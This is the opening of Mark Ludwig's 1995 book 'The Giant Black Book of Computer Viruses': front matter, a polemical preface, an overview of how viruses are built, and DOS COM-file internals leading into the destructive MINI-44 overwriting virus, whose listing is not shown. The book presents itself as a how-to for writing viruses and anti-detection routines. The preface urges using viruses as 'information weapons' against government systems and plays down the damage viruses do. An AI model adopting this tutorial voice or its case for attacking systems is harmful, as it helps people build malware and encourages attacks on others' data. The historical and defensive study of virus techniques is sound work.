Mark Ludwig
American Eagle Publications, Inc.
ISBN 0-929408-10-1
1995
Download PDF version of this book (zip, 4.8Mb)
Download the companion disk (zip, 320Kb)
American Eagle Publications, Inc., 1995 Post Office Box 1507 Show Low, Arizona 85901 © 1995 Mark A. Ludwig Front cover artwork (c) 1995 Mark Forrer Library of Congress Cataloging-in-publication data LC Control Number: 95020534 Personal Name: Ludwig, Mark A. Main Title: The giant black book of computer viruses / by Mark Ludwig. Published/Created: Show Low, Ariz. : American Eagle, 1995. Description: 662 p. : ill. ; 22 cm. ISBN: 0929408101 (alk. paper) Notes: Includes index. Subjects: Computer viruses. LC Classification: QA76.76.C68 L79 1995 Dewey Class No.: 005.8 20
This book will simply and plainly teach you how to write computer viruses. It is not one of those all too common books that decry viruses and call for secrecy about the technology they employ, while curiously giving you just enough technical details about viruses so you don't feel like you've been cheated. Rather, this book is technical and to the point. Here you will find complete sources for plug-and-play viruses, as well as enough technical knowledge to become a proficient cutting-edge virus programmer or anti-virus programmer.
Now I am certain this book will be offensive to some people. Publication of so-called "inside information" always provokes the ire of those who try to control that information. Though it is not my intention to offend, I know that in the course of informing many I will offend some.
In another age, this elitist mentality would be derided as a relic of monarchism. Today, though, many people seem all too ready to give up their God-given rights with respect to what they can own, to what they can know, and to what they can do for the sake of their personal and financial security. This is plainly the mentality of a slave, and it is rampant everywhere I look. I suspect that only the sting of a whip will bring this perverse love affair with slavery to an end.
I, for one, will defend freedom, and specifically the freedom to learn technical information about computer viruses. As I see it, there are three reasons for making this kind of information public:
Let's discuss each of these three points in detail...
The standard paradigm for defending against viruses is to buy an anti-virus product and let it catch viruses for you. For the average user who has a few application programs to write letters and balance his checkbook, that is probably perfectly adequate. There are, however, times when it simply is not.
In a company which has a large number of computers, one is bound to run across less well-known viruses, or even new viruses. Although there are perhaps 100 viruses which are responsible for 98% of all virus infections, rarer varieties do occasionally show up, and sometimes you are lucky enough to be attacked by something entirely new. In an environment with lots of computers, the probability of running into a virus which your anti-virus program can't handle easily is obviously higher than for a single user who rarely changes his software configuration.
Firstly, there will always be viruses which anti-virus programs can not detect. There is often a very long delay between when a virus is created and when an anti-virus developer incorporates proper detection and removal procedures into his software. I learned this only too well when I wrote The Little Black Book of Computer Viruses. That book included four new viruses, but only one anti-virus developer picked up on those viruses in the first six months after publication. Most did not pick up on them until after a full year in print, and some still don't detect these viruses. The reason is simply that a book was outside their normal channels for acquiring viruses. Typically anti-virus vendors frequent underground BBS's, trade among each other, and depend on their customers for viruses. Any virus that doesn't come through those channels may escape their notice for years. If a published virus can evade most for more than a year, what about a private release?
Next, just because an anti-virus program is going to help you identify a virus doesn't mean it will give you a lot of help getting rid of it. Especially with the less common varieties, you might find that the cure is worse than the virus itself. For example, your "cure" might simply delete all the EXE files on your disk, or rename them to VXE, etc.
In the end, any competent professional must realize that solid technical knowledge is the foundation for all viral defense. In some situations it is advisable to rely on another party for that technical knowledge, but not always. There are many instances in which a failure of data integrity could cost people their lives, or could cost large sums of money, or could cause pandemonium. In these situations, waiting for a third party to analyze some new virus and send someone to your site to help you is out of the question. You have to be able to handle a threat when it comes-and this requires detailed technical knowledge.
Finally, even if you intend to rely heavily on a commercial anti-virus program for protection, solid technical knowledge will make it possible to conduct an informal evaluation of that product. I have been appalled at how poor some published anti-virus product reviews have been. For example, PC Magazine's reviews in the March 16, 1993 issue 1 put Central Point Anti-Virus in the Number One slot despite the fact that this product could not even complete analysis of a fairly standard test suite of viruses (it hung the machine) 2 and despite the fact that this product has some glaring security holes which were known both by virus writers and the antiviral community at the time,3 and despite the fact that the person in charge of those reviews was specifically notified of the problem. With a bit of technical knowledge and the proper tools, you can conduct your own review to find out just what you can and cannot expect form an anti-virus program.
High-tech warfare relies increasingly on computers and information. 4 Whether we're talking about a hand-held missile, a spy satellite or a ground station, an early-warning radar station or a personnel carrier driving cross country, relying on a PC and the Global Positioning System to navigate, computers are everywhere. Stopping those computers or convincing them to report misinformation can thus become an important part of any military strategy or attack.
In the twentieth century it has become the custom to keep military technology cloaked in secrecy and deny military power to the people. As such, very few people know the first thing about it, and very few people care to know anything about it. However, the older American tradition was one of openness and individual responsibility. All the people together were the militia, and standing armies were the bain of free men.
In suggesting that information about computer viruses be made public because of its potential for military use, I am harking back to that older tradition. Standing armies and hordes of bureaucrats are a bain to free men. (And by armies, I don't just mean Army, Navy, Marines, Air Force, etc.)
It would seem that the governments of the world are inexorably driving towards an ideal: the Orwellian god-state. Right now we have a first lady who has even said the most important book she's ever read was Orwell's 1984. She is working hard to make it a reality, too. Putting military-grade weapons in the hands of ordinary citizens is the surest way of keeping tyranny at bay. That is a time-honored formula. It worked in America in 1776. It worked in Switzerland during World War II. It worked for Afganistan in the 1980's, and it has worked countless other times. The Orwellian state is an information monopoly. Its power is based on knowing everything about everybody. Information weapons could easily make it an impossibility.
I have heard that the US Postal Service is ready to distribute 100 million smart cards to citizens of the US. Perhaps that is just a wild rumor. Perhaps by the time you read this, you will have received yours. Even if you never receive it, though, don't think the government will stop collecting information about you, and demand that you - or your bank, phone company, etc. - spend more and more time sending it information about yourself. In seeking to become God it must be all-knowing and all-powerful.
Yet information is incredibly fragile. It must be correct to be useful, but what if it is not correct? Let me illustrate: before long we may see 90% of all tax returns being filed electronically. However, if there were reason to suspect that 5% of those returns had been electronically modified (e.g. by a virus), then none of them could be trusted. 5 Yet to audit every single return to find out which were wrong would either be impossible or it would catalyze a revolution - I'm not sure which. What if the audit process released even more viruses so that none of the returns could be audited unless everything was shut down, and they were gone through by hand one by one?
In the end, the Orwellian state is vulnerable to attack - and it should be attacked. There is a time when laws become immoral, and to obey them is immoral, and to fight against not only the individual laws but the whole system that creates them is good and right. I am not saying we are at that point now, as I write. Certainly there are many laws on the books which are immoral, and that number is growing rapidly. One can even argue that there are laws which would be immoral to obey. Perhaps we have crossed the line, or perhaps we will sometime between when I wrote this and when you are reading. In such a situation, I will certainly sleep better at night knowing that I've done what I could to put the tools to fight in people's hands.
Put quite simply, computer viruses are fascinating. They do something that's just not supposed to happen in a computer. The idea that a computer could somehow "come alive" and become quite autonomous from man was the science fiction of the 1950's and 1960's. However, with computer viruses it has become the reality of the 1990's. Just the idea that a program can take off and go - and gain an existence quite apart from its creator - is fascinating indeed. I have known many people who have found viruses to be interesting enough that they've actually learned assembly language by studying them.
A whole new scientific discipline called Artificial Life has grown up around this idea that a computer program can reproduce and pass genetic information on to its offspring. What I find fascinating about this new field is that it allows one to study the mechanisms of life on a purely mathematical, informational level. That has at least two big benefits: 6
In view of these considerations, it would seem that computer-based self-reproducing automata could bring on an explosion of new mathematical knowledge about life and how it works.
Where this field will end up, I really have no idea. However, since computer viruses are the only form of artificial life that have gained a foothold in the wild, we can hardly dismiss them as unimportant, scientifically speaking.
Despite their scientific importance, some people would no doubt like to outlaw viruses because they are perceived as a nuisance. (And it matters little whether these viruses are malevolent, benign, or even beneficial.) However, when one begins to consider carbon-based life from the point of view of inanimate matter,one reachesmuch thesame conclusions. Weusually assume that life is good and that it deserves to be protected. However, one cannot take a step further back and see life as somehow beneficial to the inanimate world. If we consider only the atoms of the universe, what difference does it make if the temperature is seventy degrees fahrenheit or twenty million? What difference would it make if the earth were covered with radioactive materials? None at all. Whenever we talk about the environment and ecology, we always assume that life is good and that it should be nurtured and preserved. Living organisms universally use the inanimate world with little concern for it, from the smallest cell which freely gathers the nutrients it needs and pollutes the water it swims in, right up to the man who crushes up rocks to refine the metals out of them and build airplanes. Living organisms use the material world as they see fit. Even when people get upset about something like strip mining, or an oil spill, their point of reference is not that of inanimate nature. It is an entirely selfish concept (with respect to life) that motivates them. The mining mars the beauty of the landscape-a beauty which is in the eye of the (living) beholder-and it makes it uninhabitable. If one did not place a special emphasis on life, one could just as well promote strip mining as an attempt to return the earth to its pre-biotic state! From the point of view of inanimate matter, all life is bad because it just hastens the entropic death of the universe.
I say all of this not because I have a bone to pick with ecologists. Rather I want to apply the same reasoning to the world of computer viruses. As long as one uses only financial criteria to evaluate the worth of a computer program, viruses can only be seen as a menace. What do they do besides damage valuable programs and data? They are ruthless in attempting to gain access to the computer system resources, and often the more ruthless they are, themore successful. Yet how does that differ from biological life? If a clump of moss can attack a rock to get some sunshine and grow, it will do so ruthlessly. We call that beautiful. So how different is that from a computer virus attaching itself to a program? If all one is concerned about is the preservation of the inanimate objects (which are ordinary programs) in this electronic world, then of course viruses are a nuisance.
But maybe there is something deeper here. That all depends on what is most important to you, though. It seems that modern culture has degenerated to the point where most men have no higher goals in life than to seek their own personal peace and prosperity. By personal peace, I do not mean freedom from war, but a freedom to think and believe whatever you want without ever being challenged in it. More bluntly, the freedom to live in a fantasy world of your own making. By prosperity, I mean simply an ever increasing abundance of material possessions. Karl Marx looked at all of mankind and said that the motivating force behind every man is his economic well being. The result, he said, is that all of history can be interpreted in terms of class struggles-people fighting for economic control. Even though many decry Marx as the father of communism, our nation is trying to squeeze into the straight jacket he has laid for us. Here in America, people vote their wallets, and the politicians know it. That's why 98% of them go back to office election after election, even though many of them are great philanderers.
In a society with such values, the computer becomes merely a resource which people use to harness an abundance of information and manipulate it to their advantage. If that is all there is to computers, then computer viruses are a nuisance, and they should be eliminated. Surely there must be some nobler purpose for mankind than to make money, despite its necessity. Marx may not think so. The government may not think so. And a lot of loudmouthed people may not think so. Yet great men from every age and every nation testify to the truth that man does have a higher purpose. Should we not be as Socrates, who considered himself ignorant, and who sought Truth and Wisdom, and valued them more highly than silver and gold? And if so, the question that really matters is not how computers can make us wealthy or give us power over others, but how they might make us wise. What can we learn about ourselves? about our world? and, yes, maybe even about God? Once we focus on that, computer viruses become very interesting. Might we not understand life a little better if we can create something similar, and study it, and try to understand it? And if we understand life better, will we not understand our lives, and our world better as well?
Several years ago I would have told you that all the information in this book would probably soon be outlawed. However, I think The Little Black Book has done some good work in changing people's minds about the wisdom of outlawing it. There are some countries, like England and Holland (hold outs of monarchism) where there are laws against distributing this information. Then there are others, like France, where important precedents have been set to allow the free exchange of such information. What will happen in the US right now is anybody's guess. Although the Bill of Rights would seem to protect such activities, the Constitution has never stopped Congress or the bureaucrats in the past-and the anti-virus lobby has been persistent about introducing legislation for years now.
In the end, I think the deciding factor will simply be that the anti-virus industry is imploding. After the Michelangelo scare, the general public becamecynical about viruses,viewingthemasmuch less of a problem than the anti-virus people would like. Good anti-virus programs are commanding less and less money, and the industry has shrunk dramatically in the past couple years. Companies are dropping their products, merging, and diversifying left and right. The big operating system manufacturers provideananti-virus program with DOS now, and shareware/freeware anti-virus software which does a good job is widely available. In short, there is a full scale recession in this industry, and money spent on lobbying can really only be seen as cutting one's own throat.
Yet these developments do not insure that computer viruses will survive. It only means they probably won't be outlawed. Much more important to the long term survival of viruses as a viable form of programming is to find beneficial uses for them. Most people won't suffer even a benign virus to remain in their computer once they know about it, since they have been conditioned to believe that VIRUS = BAD. No matter how sophisticated the stealth mechanism, it is no match for an intelligent programmer who is intent on catching the virus. This leaves virus writers with one option: create viruses which people will want on their computers.
Some progresshas already been made in this area. For example, the virus called Cruncher compresses executable files and saves disk space for you. The Potassium Hydroxide virus encrypts your hard disk and floppies with a very strong algorithm so that no one can access it without entering the password you selected when you installed it. I expect we will see more and more beneficial viruses like this as time goes on. As the general public learns to deal with viruses more rationally, it begins to make sense to ask whether any particular application might be better implemented using self-reproduction. We will discuss this more in later chapters.
For now, I'd like to invite you to take the attitude of an early scientist. These explorers wanted to understand how the world worked-and whether it could be turned to a profit mattered little. They were trying to become wiser in what's really important by understanding the world a little better. After all, what value could there be in building a telescope so you could see the moons around Jupiter? Galileo must have seen something in it, and it must have meant enough to him to stand up to the ruling authorities of his day and do it, and talk about it, and encourage others to do it. And to land in prison for it. Today some people are glad he did.
So why not take the same attitude when it comes to creating "life" on a computer? One has to wonder where it might lead. Could there be a whole new world of electronic artificial life forms possible, of which computer viruses are only the most rudimentary sort? Perhaps they are the electronic analog of the simplest onecelled creatures, which were only the tiny beginning of life on earth. What would be the electronic equivalent of a flower, or a dog? Where could it lead? The possibilities could be as exciting as the idea of a man actually standing on the moon would have been to Galileo. We just have no idea.
Whatever those possibilities are, one thing is certain: the openminded individual - the possibility thinker - who seeks out what is true and right, will rule the future. Those who cower in fear, those who run for security and vote for personal peace and affluence have no future. No investor ever got rich by hiding his wealth in safe investments. No intellectual battle was ever won through retreat. No nation has ever become great by putting its citizens' eyes out. So put such foolishness aside and come explore this fascinating new world with me.
What is a computer virus? Simply put, it is a program that reproduces. When it is executed, it simply makes one or more copies of itself. Those copies may later be executed to create still more copies, ad infinitum.
Typically, a computer virus attaches itself to another program, or rides on the back of another program, in order to facilitate reproduction. This approach sets computer viruses apart from other self-reproducing software because it enables the virus to reproduce without the operator's consent. Compare this with a simple program called "1.COM". When run, it might create "2.COM" and "3.COM", etc., which would be exact copies of itself. Now, the average computer user might run such a program once or twice at your request, but then he'll probably delete it and that will be the end of it. It won't get very far. Not so, the computer virus, because it attaches itself to otherwise useful programs. The computer user will execute these programs in the normal course of using the computer, and the virus will get executed with them. In this way, viruses have gained viability on a world-wide scale.
Actually, the term computer virus is a misnomer. It was coined by Fred Cohen in his 1985 graduate thesis, 1 which discussed self-reproducing software and its ability to compromise so-called secure systems. Really, "virus" is an emotionally charged epithet. The very word bodes evil and suggests something bad. Even Fred Cohen has repented of having coined the term,2 and he now suggests that we call these programs "living programs" instead. Personally I prefer the more scientific term self-reproducing automaton.3 That simply describes what such a program does without adding the negative emotions associated with "virus" yet also without suggesting life where there is a big question whether we should call something truly alive. However, I know that trying to re-educate people who have developed a bad habit is almost impossible, so I'm not going to try to eliminate or replace the term "virus", bad though it may be.
In fact, a computer virus is much more like a simple one-celled living organism than it is like a biological virus. Although it may attach itself to other programs, those programs are not alive in any sense. Furthermore, the living organism is not inherently bad, though it does seem to have a measure of self-will. Just as lichens may dig into a rock and eat it up over time, computer viruses can certainly dig into your computer and do things you don't want. Some of the more destructive ones will wipe out everything stored on your hard disk, while any of them will at least use a few CPU cycles here and there.
Aside from the aspect of self-will, though, we should realize that computer viruses per se are not inherently destructive. They may take a few CPU cycles, however since a virus that gets noticed tends to get wiped out, the only successful viruses must take only an unnoticeable fraction of your system's resources. Viruses that have given the computer virus a name for being destructive generally contain logic bombs which trigger at a certain date and then display a message or do something annoying or nasty. Such logic bombs, however, have nothing to do with viral self-reproduction. They are payloads - add ons - to the self-reproducing code.
When I say that computer viruses are not inherently destructive, of course, I do not mean that you don't have to watch out for them. There are some virus writers out there who have no other goal but to destroy the data on your computer. As far as they are concerned, they want their viruses to be memorable experiences for you. They're nihilists, and you'd do well to try to steer clear from the destruction they're trying to cause. So by all means do watch out ... but at the same time, consider the positive possibilities of what self-reproducing code might be able to do that ordinary programs may not. After all, a virus could just as well have some good routines in it as bad ones.
Every viable computer virus must have at least two basic parts, or subroutines, if it is even to be called a virus. Firstly, it must contain a search routine, which locates new files or new disks which are worthwhile targets for infection. This routine will determine how well the virus reproduces, e.g., whether it does so quickly or slowly, whether it can infect multiple disks or a single disk, and whether it can infect every portion of a disk or just certain specific areas. As with all programs, there is a size versus functionality tradeoffhere. The more sophisticated the search routine is, the more space it will take up. So although an efficient search routine may help a virus to spread faster, it will make the virus bigger.
Secondly, every computer virus must contain a routine to copy itself into the program which the search routine locates. The copy routine will only be sophisticated enough to do its job without getting caught. The smaller it is, the better. How small it can be will depend on how complex a virus it must copy, and what the target is. For example, a virus which infects only COM files can get by with a much smaller copy routine than a virus which infects EXE files. This is because the EXE file structure is much more complex, so the virus must do more to attach itself to an EXE file.
In addition to search and copy mechanisms, computer viruses often contain anti-detection routines, or anti-anti-virus routines. These range in complexity from something that merely keeps the date on a file the same when a virus infects it, to complex routines that camouflage viruses and trick specific anti-virus programs into believing they're not there, or routines which turn the anti-virus they attack into a logic bomb itself.
Both the search and copy mechanisms can be designed with anti-detection in mind, as well. For example, the search routinemay be severely limited in scope to avoid detection. A routine which checked every file on every disk drive, without limit, would take a long time and it would cause enough unusual disk activity that an alert user would become suspicious.
Finally, a virus may contain routines unrelated to its ability to reproduce effectively. These may be destructive routines aimed at wiping out data, or mischievous routines aimed at spreading a political message or making people angry, or even routines that perform some useful function.
Computer viruses are normally classified according to the types of programs they infect and the method of infection employed. The broadest distinction is between boot sector infectors, which take over the boot sector (which executes only when you first turn your computer on) and file infectors, which infect ordinary program files on a disk. Some viruses, known as multi-partite viruses, infect both boot sectors and program files.
Program file infectors may be further classified according to which types of programs they infect. They may infect COM, EXE or SYS files, or any combination thereof. Then EXE files come in a variety of flavors, including plain-vanilla DOS EXE's, Windows EXE's, OS/2 EXE's, etc. These types of programs have considerable differences, and the viruses that infect them are very different indeed.
Finally, we must note that a virus can be written to infect any kind of code, even code that might have to be compiled or interpreted before it can be executed. Thus, a virus could infect a C or Basic program, a batch file, or a Paradox or Dbase program. It needn't be limited to infecting machine language programs.
Most viruses are written in assembly language. High level languages like Basic, C and Pascal have been designed to generate stand-alone programs, but the assumptions made by these languages render them almost useless when writing viruses. They are simply incapable of performing the acrobatics required for a virus to jump from one host program to another. Apart from a few exceptions we'll discuss, one must use assembly language to write viruses. It is just the only way to get exacting control over all the computer system's resources and use them the way you want to, rather than the way somebody else thinks you should.
This book is written to be accessible to anyone with a little experience with assembly language programming, or to anyone with any programming experience, provided they're willing to do a little work to learn assembler. Many people have told me that The Little Black Book was an excellent tutorial on assembly language programming. I would like to think that this book will be an even better tutorial.
If you have not done any programming in assembler before, I would suggest you get a good tutorial on the subject to use along side of this book. (A few are mentioned in the Suggested Reading at the end of this book.) In the following chapters, I will assume that your knowledge of the technical details of PC's - like file structures, function calls, segmentation and hardware design - is limited, and I will try to explain such matters carefully at the start. However, I will assume that you have some knowledge of assembly language - at least at the level where you can understand what some of the basic machine instructions, like mov ax,bx do. If you are not familiar with simpler assembly language programming like this, go get a book on the subject. With a little work it will bring you up to speed.
If you are somewhat familiar with assembler already, then all you'll need to get some of the viruses here up and running is this book and an assembler. The viruses published here are written to be compatible with three popular assemblers, unless otherwise noted. These assemblers are (1) Microsoft's Macro Assembler, MASM, (2) Borland's Turbo Assembler, TASM, and 3) the shareware A86 assembler. Of these I personally prefer TASM, because it does exactly what you tell it to without trying to out smart you - and that is exactly what is needed to assemble a virus. The only drawback with it is that you can't assemble and link OS/2 programs and some special Windows programs like Virtual Device Drivers with it. My second choice is MASM, and A86 is clearly third. Although you can download A86 from many BBS's or the Internet for free, the author demands a hefty license fee if you really want to use the thing - as much as the cost of MASM - and it is clearly not as good a product.
This book is broken down into three parts. The first section discusses viral reproduction techniques, ranging from the simplest overwriting virus to complex multi-partite viruses and viruses for advanced operating systems. The second section discusses antianti-virus techniques commonly used in viruses, including simple techniques to hide file changes, ways to hide virus code from prying eyes, and polymorphism. The third section discusses payloads, both destructive and beneficial.
One final word before digging into some actual viruses: if you don't understand what any of the particular viruses we discuss in this book are doing, don't mess with them. Don't just blindly type in the code, assemble it, and run it. That is asking for trouble, just like a four year old child with a loaded gun. Also, please don't cause trouble with these viruses. I'm not describing them so you can unleash them on innocent people. As far as people who deserve it, pleaseatleast try to turn the other cheek. I maybe giving you power, but with it comes the responsibility to gain wisdom.
When learning about viruses it is best to start out with the simplest examples and understand them well. Such viruses are not only easy to understand ... they also present the least risk of escape, so you can experiment with them without the fear of roasting your company's network. Given this basic foundation, we can build fancier varieties which employ advanced techniques and replicate much better. That will be the mission of later chapters.
In the world of DOS viruses, the simplest and least threatening is the non-resident COM file infector. This type of virus infects only COM program files, which are just straight 80x86 machine code. They contain no data structures for the operating system to interpret (unlike EXE files) - just code. The very simplicity of a COM file makes it easy to infect with a virus. Likewise, non-resident viruses leave no code in memory which goes on working after the host program (which the virus is attached to) is done working. That means as long as you're sitting at the DOS prompt, you're safe. The virus isn't off somewhere doing something behind your back.
Now be aware that when I say a non-resident COM infector is simple and non-threatening, I mean that in terms of its ability to reproduce and escape. There are some very nasty non-resident COM infectors floating around in the underground. They are nasty because they contain nasty logic bombs, though, and not because they take the art of virus programming to new highs.
There are three major types of COM infecting viruses which we will discuss in detail in the next few chapters. They are called:
If you can understand these three simple types of viruses, you will already understand the majority of viruses being written today. Most of them are one of these three types and nothing more.
Before we dig into how the simplest of these viruses, the overwriting virus works, let's take an in-depth look at how a COM program works. It is essential to understand what it is you're attacking if you're going to do it properly.
When one enters the name of a program at the DOS prompt, DOS begins looking for files with that name and an extent of "COM". If it finds one it will load the file into memory and execute it. Otherwise DOS will look for files with the same name and an extent of "EXE" to load and execute. If no EXE file is found, the operating system will finally look for a file with the extent "BAT" to execute. Failing all three of these possibilities, DOS will display the error message "Bad command or file name."
EXE and COM files are directly executable by the Central Processing Unit. Of these two types of program files, COM files are much simpler. They have a predefined segment format which is built into the structure of DOS, while EXE files are designed to handle a segment format defined by the programmer, typical of very large and complicated programs. The COM file is a direct binary image of what should be put into memory and executed by the CPU, but an EXE file is not.
To execute a COM file, DOS does some preparatory work, loads the program into memory, and then gives the program control. Up until the time when the program receives control, DOS is the program executing, and it is manipulating the program as if it were data. To understand this whole process, let's take a look at the operation of a simple non-viral COM program which is the assembly language equivalent of hello.c - that infamous little program used in every introductory c programming course. Here it is:
.model tiny
.code
ORG 100H
HOST:
mov ah, 9 ;prepare to display a message
mov dx,OFFSET HI ;address of message
int 21H ;display it with DOS
mov ax, 4C00H ;prepare to terminate program
int 21H ;and terminate with DOS
HI DB 'You have just released a virus! Have a nice day!$'
END HOST
Call it HOST.ASM. It will assemble to HOST.COM. This program will serve us well in this chapter, because we'll use it as a host for virus infections.
Now, when you type "HOST" at the DOS prompt, the first thing DOS does is reserve memory for this program to live in. To understand how a COM program uses memory, it is useful to remember that COM programs are really a relic of the days of CP/M - an old disk operating system used by earlier microcomputers that used 8080 or Z80 processors. In those days, the processor could only address 64 kilobytes of memory and that was it. When MS-DOS and PC-DOS came along, CP/M was very popular. There were thousands of programs - many shareware - for CP/M and practically none for any other processor or operating system (excepting theAppleII). So both the 8088 and MS-DOS were designed to make porting the old CP/M programs as easy as possible. The 8088-based COM program is the end result.
In the 8088 microprocessor, all registers are 16 bit registers. A 16 bit register will only allow one to address 64 kilobytes of memory, just like the 8080 and Z80. If you want to use more memory, you need more bits to address it. The 8088 can address up to one megabyte of memory using a process known as segmentation. It uses two registers to create a physical memory address that is 20 bits long instead of just 16. Such a register pair consists of a segment register, which contains the most significant bits of the address, and an offset register, which contains the least significant bits. The segment register points to a 16 byte block of memory, and the offset register tells how many bytes to add to the start of the 16 byte block to locate the desired byte in memory. For example, if the ds register is set to 1275 Hex and the bx register is set to 457 Hex, then the physical 20 bit address of the byte ds:[bx] is
1275H x 10H = 12750H + 457H ---------- 12BA7H
No offset should ever have to be larger than 15, but one normally uses values up to the full 64 kilobyte range of the offset register. This leads to the possibility of writing a single physical address in several different ways. For example, setting ds = 12BA Hex and bx = 7 would produce the same physical address 12BA7 Hex as in the example above. The proper choice is simply whatever is convenient for the programmer. However, it is standard programming practice to set the segment registers and leave them alone as much as possible, using offsets to range through as much data and code as one can (64 kilobytes if necessary). Typically, in 8088 assembler, the segment registers are implied quantities. For example, if you write the assembler instruction
mov ax,[bx]
when the bx register is equal to 7, the ax register will be loaded with the word value stored at offset 7 in the data segment. The data segment ds never appears in the instruction because it is automatically implied. If ds = 12BAH, then you are really loading the word stored at physical address 12BA7H.
The 8088 has four segment registers, cs, ds, ss and es, which stand for Code Segment, Data Segment, Stack Segment, and Extra Segment, respectively. They each serve different purposes. The cs stgister specifies the 64K segment where the actual program instructions which are executed by the CPU are located. The Data Segment is used to specify a segment to put the program's data in, and the Stack Segment specifis where the program's stack is located. The es register is available as an extra segment register for the programmer's use. It might be used to point to the video memory segment, for writing data directly to video, or to the segment 40H where the BIOS stores crucial low-level configuration information about the computer.
COM files, as a carry-over from the days when there was only 64K memory available, use only one segment. Before executing a COM file, DOS sets all the segment registers to one value, cs=ds=es=ss. All data is stored in the same segment as the program code itself, and the stack shares this segment. Since any given segment is 64 kilobytes long, a COM program can use at most 64 kilobytes for all of its code, data and stack. And since segment registers are usually implicit in the instructions, an ordinary COM program which doesn't need to access BIOS data, or video data, etc., directly need never fuss with them. The program HOST is a goodexample. It contains no direct referencestoanysegment; DOS can load it into any segment and it will work fine.
The segment used by a COM program must be set up by DOS before the COM program file itself is loaded into this segment at offset 100H. DOS also creates a Program Segment Prefix, or PSP, in memory from offset 0 to 0FFH (See Figure 3.1).
| Offset | Size | Description |
|---|---|---|
| 0 H | 2 | Int 20H Instruction |
| 2 | 2 | Address of last allocated segment |
| 4 | 1 | Reserved, should be zero |
| 5 | 5 | Far call to Int 21H vector |
| A | 4 | Int 22H vector (Terminate program) |
| E | 4 | Int 23H vector (Ctrl-C handler) |
| 12 | 4 | Int 24H vector (Critical error handler) |
| 16 | 22 | Reserved |
| 2C | 2 | Segment of DOS environment |
| 2E | 34 | Reserved |
| 50 | 3 | Int 21H / RETF instruction |
| 53 | 9 | Reserved |
| 5C | 16 | File Control Block 1 |
| 6C | 20 | File Control Block 2 |
| 80 | 128 | Default DTA (command line at startup) |
| 100 | - | Begining of COM program |
Fig. 3.1: The Program Segment Prefix
The PSP is really a relic from the days of CP/M too, when this low memory was where the operating system stored crucial data for the system. Much of it isn't used at all in most programs. For example, it contains file control blocks (FCB's) for use with the DOS file open/read/write/close functions 0FH, 10H, 14H, 15H, etc. Nobody in their right mind uses those functions, though. They're CP/M relics. Much easier to use are the DOS handle-based functions 3DH, 3EH, 3FH, 40H, etc., which were introduced in DOS 2.00. Yet it is conceivable these old functions could be used, so the needed data in the PSP must be maintained. At the same time, other parts of the PSP are quite useful. For example, everything after the program name in the command line used to invoke the COM program is stored in the PSP starting at offset 80H. If we had invoked HOST as
C:\HOST Hello there!
then the PSP would look like this:
2750:0000 CD 20 00 9D 00 9A F0 FE-1D F0 4F 03 85 21 8A 03 . ........O..!.. 2750:0010 85 21 17 03 85 21 74 21-01 08 01 00 02 FF FF FF .!...!t!........ 2750:0020 FF FF FF FF FF FF FF FF-FF FF FF FF 32 27 4C 01 ............2'L. 2750:0030 45 26 14 00 18 00 50 27-FF FF FF FF 00 00 00 00 E&....P'........ 2750:0040 06 14 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 2750:0050 CD 21 CB 00 00 00 00 00-00 00 00 00 00 48 45 4C .!...........HEL 2750:0060 4C 4F 20 20 20 20 20 20-00 00 00 00 00 54 48 45 LO .....THE 2750:0070 52 45 21 20 20 20 20 20-00 00 00 00 00 00 00 00 RE! ........ 2750:0080 0E 20 48 65 6C 6C 6F 20-74 68 65 72 65 21 20 0D . Hello there! . 2750:0090 6F 20 74 68 65 72 65 21-20 0D 61 72 64 0D 00 00 o there! .ard... 2750:00A0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 2750:00B0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 2750:00C0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 2750:00D0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 2750:00E0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 2750:00F0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
At 80H wefindthe value 0EH, which is the length of "Hello there!", followed by the string itself, terminated by <CR>=0DH. Likewise, the PSP contains the address of the system environment, which contains all of the "set" variables contained in AUTOEXEC.BAT, as well as the path which DOS searches for executables when you type a name at the command string. This path is a nice variable for a virus to get a hold of, since it tells the virus where to find lots of juicy programs to infect.
The final step which DOS must take before actually executing the COM file is to set up the stack. Typically the stack resides at the very top of the segment in which a COM program resides (See Figure 3.2). The first two bytes on the stack are always set up by DOS so that a simple RET instruction will terminate the COM program and return control to DOS. (This, too, is a relic from CP/M.) These bytes are set to zero to cause a jump to offset 0, where the int 20H instruction is stored in the PSP. The int 20H returns control to DOS. DOS then sets the stack pointer sp to FFFE Hex, and jumps to offset 100H, causing the requested COM program to execute.
OK, armed with this basic understanding of how a COM program works, let's go on to look at the simplest kind of virus.
Overwriting viruses are simple but mean viruses which have little respect for your programs. Once infected by an overwriting virus, the host program will no longer work properly because at least a portion of it has been replaced by the virus code - it has been overwritten - hence the name.
Fig. 3.2: Memory map just before executing a COM file.
This disprespect for program code makes programming an overwriting virus an easy task, though. In fact, some of the world's smallest viruses are overwriting viruses. Let's take a look at one, MINI-44.ASM, listed in Figure 3.3. This virus is a mere 44 bytes when assembled, but it will infect (and destroy) every COM file in your current directory if you run it.
This virus operates as follows:
As you can see, the end result is that every COM file in the current directory becomes infected, and the infected host program which was loaded executes the virus instead of the host.
The basic functions of searching for files and writing to files are widely used in many programs and many viruses, so let's dig into the MINI-44 a little more deeply to understand its search and infection mechanisms.
Fig. 3.3: The MINI-44 Virus Listing
To understand how a virus searches for new files to infect on an IBM PC style computer operating under DOS, it is important to understand how DOS stores files and information about them. All of the information about every file on disk is stored in two areas on disk, known as the directory and the File Allocation Table, or FAT for short. The directory contains a 32 byte file descriptor record for each file. (See Figure 3.4) This descriptor record contains the file's name and extent, its size, date and time of creation, and the file attribute, which contains essential information for the operating system about how to handle the file. The FAT is a map of the entire disk, which simply informs the operating system which areas are occupied by which files.
Each disk has two FAT's, which are identical copies of each other. The second is a backup, in case the first gets corrupted. On the other hand, a disk may have many directories. One directory, known as the root directory, is present on every disk, but the root may have multiple subdirectories, nested one inside of another to form a tree structure. These subdirectories can be created, used, and removed by the user at will. Thus, the tree structure can be as simple or as complex as the user has made it.
Fig. 3.4: The directory entry record.
